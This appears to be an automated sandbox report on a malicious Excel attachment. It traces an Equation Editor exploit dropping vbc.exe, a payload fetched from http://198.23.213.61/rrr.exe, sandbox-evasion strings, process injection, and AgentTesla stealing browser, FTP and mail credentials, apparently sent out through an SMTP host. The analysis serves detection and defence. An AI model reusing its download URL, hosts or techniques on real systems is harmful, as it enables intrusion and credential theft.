Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ORDER 9387383900.xlsx

Initial sample: OLE indicators vbamacros = False

Source: ORDER 9387383900.xlsx

Initial sample: OLE indicators encrypted = True

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00218397 push ebp; iretd	4_2_00218398
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021D7BC push edx; retf	4_2_0021D7BD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003522ED pushfd ; ret	5_2_003522F1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003530C0 pushfd ; retf	5_2_003531A1

Source: initial sample	Static PE information: section name: .text entropy: 7.78593990731
Source: initial sample	Static PE information: section name: .text entropy: 7.78593990731

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: ORDER 9387383900.xlsx

Stream path 'EncryptedPackage' entropy: 7.99934422624 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 9145			Jump to behavior
Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 600			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 260	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2892	Thread sleep time: -100778s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1616	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1900	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1192	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1192	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1840	Thread sleep count: 9145 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1840	Thread sleep count: 600 > 30	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1192	Thread sleep count: 92 > 30	Jump to behavior

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 100778	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior

Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2345833661.0000000001050000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3662578.5.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3044, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2916, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.387bed0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3662578.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Path Interception	Process Injection112	Disable or Modify Tools11	OS Credential Dumping2	File and Directory Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information1	Credentials in Registry1	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information31	Security Account Manager	Security Software Discovery211	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing2	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading111	LSA Secrets	Virtualization/Sandbox Evasion131	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol32	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion131	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ORDER 9387383900.xlsx	33%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe	100%	Joe Sandbox ML
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://bfdUomDwe8FRPCAbrg.com	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://htJAdA.com	0%	Avira URL Cloud	safe
http://198.23.213.61/rrr.exe	100%	Avira URL Cloud	malware
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.225	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://198.23.213.61/rrr.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bfdUomDwe8FRPCAbrg.com	vbc.exe, 00000005.00000002.2345994356.000000000255A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2346039166.00000000025A9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:HTTP/1.1	vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmp	false		high
http://us2.smtp.mailhostbox.com	vbc.exe, 00000005.00000002.2346025048.0000000002598000.00000004.00000001.sdmp	false		high
http://www.day.com/dam/1.0	F3AA532.emf.0.dr	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://htJAdA.com	vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org%GETMozilla/5.0	vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.%s.comPA	vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000004.00000002.2152952419.00000000025C1000.00000004.00000001.sdmp	false		high
https://api.ipify.org%	vbc.exe, 00000005.00000002.2345938081.00000000024DA000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
